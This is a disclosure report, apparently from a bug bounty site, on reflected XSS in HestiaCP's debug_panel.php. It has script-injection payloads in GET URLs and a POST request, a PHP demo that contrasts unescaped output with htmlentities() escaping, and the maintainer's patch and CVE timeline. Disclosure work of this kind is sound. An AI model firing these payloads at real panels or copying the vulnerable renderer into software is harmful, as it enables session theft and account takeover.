Reflected XSS in hestiacp/hestiacp

Valid

Reported on

Jun 29th 2023


Description

A reflected cross-site scripting (XSS) vulnerability in templates/pages/debug_panel.php lets an attacker who gets a logged-in user to open a crafted link, or to submit a crafted form, run script in that user's browser session and steal the session token.

Proof of Concept

Send a GET request to either of the links below. The payload starts with `">` so that it closes the quoted attribute into which `id` is reflected and then injects a script tag.

http://target/templates/pages/debug_panel.php?id=xss"><script>alert(document.cookie)</script>
http://target/templates/pages/debug_panel.php?id=xss"><script>alert('xss')</script>

Send a POST request like the one below. Note that the body shown is JSON although the Content-Type header advertises a form-encoded body; if the endpoint reads `id` from $_POST, send it as a URL-encoded form field with the same payload.

POST /templates/pages/debug_panel.php HTTP/1.1
Host: demo.hestiacp.com:8083
User-Agent: curl/7.79.1
Accept: */*
Content-Length: 34
Content-Type: application/x-www-form-urlencoded
Connection: close

{"id":"<script>alert(1)</script>"}

Impact

An attacker who lures a logged-in user to a crafted link can steal the session cookie and use it for a complete account takeover (document.cookie exposes the session cookie only if it is not flagged HttpOnly; even then, script running in the victim's session can act on their behalf in the panel).

Occurrences

The `id` POST parameter is reflected into the page here without escaping. It should be passed through htmlentities() (with ENT_QUOTES, so that both quote characters are encoded) before output to prevent XSS.

The `id` GET parameter is reflected into the page here without escaping. It should be passed through htmlentities() (with ENT_QUOTES) before output to prevent XSS.
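The following is an added example, not HestiaCP's code: a stand-in for a debug panel that reflects the `id` request parameter, first unescaped as the report describes and then hardened with htmlentities(). The markup (an input element and a paragraph) and the helper names are assumptions, since the actual lines of debug_panel.php are not shown on this page; the sample values are the report's two payloads plus a benign id, constructed as input for the demo.

```php
<?php
// Added example, not HestiaCP's code: a stand-in for a debug panel that
// reflects the `id` request parameter, first as the report describes it
// (unescaped) and then hardened with htmlentities().

// Constructed sample input: the report's GET and POST payloads plus a
// benign value. The markup rendered below is an assumption; the real
// lines in debug_panel.php are not shown on the report page.
$samples = [
    'benign'       => 'abc123',
    'get-payload'  => 'xss"><script>alert(document.cookie)</script>',
    'post-payload' => '<script>alert(1)</script>',
];

// The parameter can arrive via GET or POST, matching the two occurrences
// listed in the report.
function panel_id(array $get, array $post): string
{
    return (string) ($get['id'] ?? $post['id'] ?? '');
}

// Vulnerable: the raw value is dropped into an attribute and into element
// text. The GET payload closes value="..." with "> and injects a <script>
// tag; the POST payload injects directly in the text context.
function render_vulnerable(string $id): string
{
    return '<input type="text" name="id" value="' . $id . '">' . "\n"
         . '<p>Debug id: ' . $id . '</p>';
}

// Hardened: escape once, for HTML, before output. ENT_QUOTES encodes both
// quote characters so the attribute cannot be closed early; ENT_SUBSTITUTE
// keeps htmlentities() from returning an empty string on invalid UTF-8.
function render_hardened(string $id): string
{
    $safe = htmlentities($id, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="id" value="' . $safe . '">' . "\n"
         . '<p>Debug id: ' . $safe . '</p>';
}

// Check used by the demo: a raw "<script" in the output means the payload
// survived escaping and would execute in the victim's browser.
function has_live_script_tag(string $html): bool
{
    return stripos($html, '<script') !== false;
}

foreach ($samples as $label => $id) {
    // Simulate the value arriving as a GET parameter; POST takes the same path.
    $value = panel_id(['id' => $id], []);
    $renderers = ['vulnerable' => 'render_vulnerable', 'hardened' => 'render_hardened'];
    foreach ($renderers as $mode => $fn) {
        $html = $fn($value);
        printf("[%s/%s] script tag injected: %s\n%s\n\n",
            $label, $mode, has_live_script_tag($html) ? 'yes' : 'no', $html);
    }
}
```

Run it with `php` from the command line: the two payloads report an injected script tag only in the vulnerable output, while the hardened output shows them as `&lt;script&gt;` and `&quot;` entities inside the attribute. The same htmlentities() call is the fix the report asks for at both occurrences; escaping has to happen at output time and for the HTML context the value lands in, not once at input.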

We are processing your report and will contact the hestiacp team within 24 hours. 5 months ago
Jaap Marcus modified the Severity from High (8.8) to Medium (4.3) 5 months ago
hestiacp/hestiacp maintainer has acknowledged this report 5 months ago
Jaap Marcus
5 months ago

Maintainer


Have patched the issue; will release it in the 1.8.0 release.

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Jaap Marcus validated this vulnerability 5 months ago
Vikas Gupta has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Jaap Marcus marked this as fixed in 1.7.8 with commit 2326aa 5 months ago
Jaap Marcus has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Jul 1st 2023
debug_panel.php#L25 has been validated
debug_panel.php#L31 has been validated
Jaap Marcus published this vulnerability 5 months ago
Vikas Gupta
5 months ago

Researcher


@maintainer Can someone assign a CVE to this? Thanks

Vikas Gupta
5 months ago

Researcher


Ok, I can see it is published already. Thanks
